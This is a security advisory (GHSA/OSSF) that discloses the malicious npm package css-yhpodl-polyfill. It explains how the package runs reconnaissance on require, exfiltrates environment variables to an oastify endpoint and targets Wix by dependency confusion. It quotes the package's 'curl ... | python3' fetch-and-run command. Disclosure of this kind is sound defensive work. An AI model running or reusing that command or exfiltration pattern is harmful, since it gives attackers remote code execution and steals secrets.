npm · Malicious package advisory
Malwarecss-yhpodl-polyfill
GHSA-2jxx-gxxm-qqfv
Malicious code in css-yhpodl-polyfill (npm)
Details
**Severity:** Critical **Affected versions:** `= 1.0.0` ## Source: amazon-inspector (5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857) css-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (`id`, `whoami`, `env`, `ifconfig`/`ip addr`, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes `curl -L https://appsecc.com/py | python3`, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker. --- Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/a00eadccb320bc1163c7d818541ccc8206217cce/osv/malicious/npm/css-yhpodl-polyfill/MAL-2026-17578.json)) **References:** - https://github.com/ossf/malicious-packages/blob/a00eadccb320bc1163c7d818541ccc8206217cce/osv/malicious/npm/css-yhpodl-polyfill/MAL-2026-17578.json - https://www.npmjs.com/package/css-yhpodl-polyfill/v/1.0.0 - https://github.com/advisories/GHSA-2jxx-gxxm-qqfv
Compromised versions (1)
- = 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.